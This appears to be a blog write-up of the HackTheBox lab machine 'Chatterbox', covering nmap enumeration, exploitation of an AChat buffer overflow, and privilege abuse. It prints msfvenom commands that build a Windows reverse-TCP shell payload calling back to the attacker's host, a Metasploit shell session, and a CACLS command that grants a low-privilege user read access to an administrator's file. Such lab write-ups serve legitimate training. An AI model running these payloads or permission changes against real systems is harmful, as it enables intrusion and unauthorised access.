Press "Enter" to skip to content

[HackTheBox] Chatterbox

I started off the box with an nmap scan on the target machine.

nmap -sS -sV -A 10.10.10.74

Nmap scan report for 10.10.10.74
Host is up (0.23s latency).
All 1000 scanned ports on 10.10.10.74 are filtered
Too many fingerprints match this host to give specific OS details

As you can see from above, we didn’t see anything in the first 1000 ports. On HackTheBox this usually means that there are services running on uncommon ports (I’ve seen SSH at port 65535 before) so I decided to run a more thorough scan on the target machine.

Upon running my next scan, I found two services running on port 9255 and 9256.

nmap -p 1000-10000 -sV -sS -T4 10.10.10.74

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-22 19:34 EDT
Nmap scan report for 10.10.10.74
Host is up (0.30s latency).
Not shown: 8999 filtered ports

PORT     STATE SERVICE
9255/tcp open  mon
9256/tcp open  unknown

Nmap was unable to detect what services were running on these two ports. This could mean two things (at least for HackTheBox):

  • Service was messed up because of another user.
  • You are supposed to enumerate more.

I did a quick google search returned and found nothing for port 9255 but for port 9256 there was a known vulnerability for a service known as Achat which was vulnerable to a “SEH-based stack buffer overflow.” Using this knowledge in conjunction with the box name “Chatterbox” I knew that this was the port to start my attack.

The link above references two pages, one of them is a Metasploit module for this exploit. However; a quick search on exploitdb showed that a python exploit was also available which I decided to leverage instead.

In the background, I decided to run a single port scan on the target machine to see if we could get more information about the version of the host and to my surprise it actually returned the service that the ports were running.

nmap -sS -sV -Pn -A -T4 -p 9255,9256 10.10.10.74

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-22 19:43 EDT
Nmap scan report for 10.10.10.74
Host is up (0.24s latency).

PORT     STATE SERVICE VERSION
9255/tcp open  http    AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open  achat   AChat chat system

With my theory confirmed, I decided to move on with the exploit.

By having a quick look at the python exploit, you can see comments left by the author that show how we can leverage it and also generate a payload to go with it. (The authors example spawns a calculator.)

msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

I modified mine slightly to create a reverse tcp shell back to my virtual machine as shown below.

msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp RHOST=10.10.10.74 LHOST=10.10.14.85 LPORT=8888 exitfunc=thread -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

With the payload ready to go, all I had to do was setup multi-handler via Metasploit to (hopefully) gain a shell on the system.

As expected, the payload ran fine and I was successfully able to get a meterpreter shell. I then navigated to the user directory to get the user flag.

msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
chatterbox\alfred

C:\Users\Alfred\Desktop>type user.txt
72----------------------------34

After being stuck on privilege escalation, I learned about a method where you change the permission of the a file using CACLS. By using this technique, I changed the permission of the root.txt flag and read it directly as my current user.

C:\Users\Administrator\Desktop>CACLS root.txt /E /G "alfred":R
CACLS root.txt /E /G "alfred":R
processed file: C:\Users\Administrator\Desktop\root.txt

C:\Users\Administrator\Desktop>type root.txt
type root.txt
a6----------------------------7c

This was a fairly simple box but I learned a bit about CACLS and how it can be leveraged (which I can hopefully use in the future!).

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *